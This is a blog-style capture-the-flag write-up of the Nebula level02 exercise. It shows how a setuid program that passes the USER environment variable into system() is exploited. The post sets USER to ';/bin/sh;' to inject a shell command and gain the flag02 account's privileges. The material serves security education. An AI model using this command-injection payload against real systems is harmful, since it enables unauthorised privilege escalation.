Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

We start by SSH'ing in as level02 and checking out the /home/flag02 directory:

level02@nebula:~$ cd /home/flag02/
level02@nebula:/home/flag02$ ls -lah
total 13K
drwxr-x--- 2 flag02 level02   80 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag02 flag02   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag02 flag02  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag02 level02 7.3K 2011-11-20 21:22 flag02
-rw-r--r-- 1 flag02 flag02   675 2011-05-18 02:54 .profile

We examine the code and run the flag02 file:

level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo level02 is cool")
level02 is cool

As expected, the file echo's the current user and says that we are cool :)

However, just like in level01, there is still some issues in this code. The programmer did not consider any malicious user input.

In this example, asprintf is calling the "USER" getenv. Let's see what is currently located in there:

level02@nebula:/home/flag02$ echo $USER

As you can see, this is "level02". What happens if we update it to something else? Say, "geoda" for example:

level02@nebula:/home/flag02$ export USER=geoda
level02@nebula:/home/flag02$ echo $USER
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo geoda is cool")
geoda is cool

As expected, we have updated the $USER variable to "geoda" instead of the current user "level02". When we run the file, it will print "geoda" instead.

Now, how do we exploit this further?

Well, looking at the program, we can actually "close" the code with the semi colon and run a system shell.

To do this, we update our $USER variable with the following ";/bin/sh;":

level02@nebula:/home/flag02$ echo $USER
level02@nebula:/home/flag02$ export USER=";/bin/sh;"
level02@nebula:/home/flag02$ echo $USER

Now, when we execute ./flag, it will echo ";/bin/sh;" but additionally, instead of saying ";/bin/sh; is cool", it will actually close that statement with our first semi colon and execute /bin/sh:

level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo ;/bin/sh; is cool")

sh-4.2$ id
uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02)
sh-4.2$ getflag
You have successfully executed getflag on a target account


The next post will be level03.

Thanks for reading!